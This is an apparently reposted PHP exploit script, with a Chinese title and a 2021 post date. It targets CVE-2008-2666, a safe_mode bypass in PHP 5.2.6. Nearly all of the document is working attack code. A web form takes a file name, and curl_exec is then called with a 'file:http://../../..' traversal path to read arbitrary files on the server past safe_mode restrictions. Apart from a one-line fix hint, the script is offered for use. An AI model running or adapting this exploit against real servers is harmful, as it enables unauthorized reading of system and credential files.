php 5.2.6安全模式旁路攻击

Posted 2021-02-26

<?php
/*
Exploit for CVE-2008-2666:
http://securityreason.com/achievement_securityalert/55
 
Orginal URL
http://securityreason.com/achievement_exploitalert/10
 
safe_mode Bypass PHP 5.2.6
by Maksymilian Arciemowicz http://securityreason.com
cxib [at] securityreason [dot] com
 
How to fix?
Do not use safe_mode as a main safety
*/
 
echo "<PRE><P>This is exploit from <a href="http://securityreason.com">http://securityreason.com</a>Maksymilian Arciemowicz<p>Script for legal use only.<p>PHP 5.2.6 safe_mode bypass<p>More: <a  href="http://securityreason.com/news/0/0x24">http://securityreason.com/news/0/0x24</a><p><form name="form" action="http://".$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["SCRIPT_NAME"])."" method="post"><input type="text" name="file" size="50" value=""><input type="submit" name="studiaNAuwrCZYpwrTOmanipulacja" value="Show"></form>
";
 
if(!is_dir(dirname(__FILE__)."/http:")){ // can work without this requirement
if(!is_writable(dirname(__FILE__))) die("<b>I can't create http:directory</b>");
mkdir("http:");
}
 
if(empty($file) and empty($_GET['file']) and empty($_POST['file']))
die("
".$karatonik);
 
if(!empty($_GET['file'])) $file=$_GET['file'];
if(!empty($_POST['file'])) $file=$_POST['file'];
 
 
if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) and !empty($file)) die("<B><br>best regards cxib from securityreason.com</B></FONT>");
elseif(!emptY($file)) die("<FONT COLOR="RED"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> doesn't exists or you don't have permissions.</CENTER></FONT>");
?>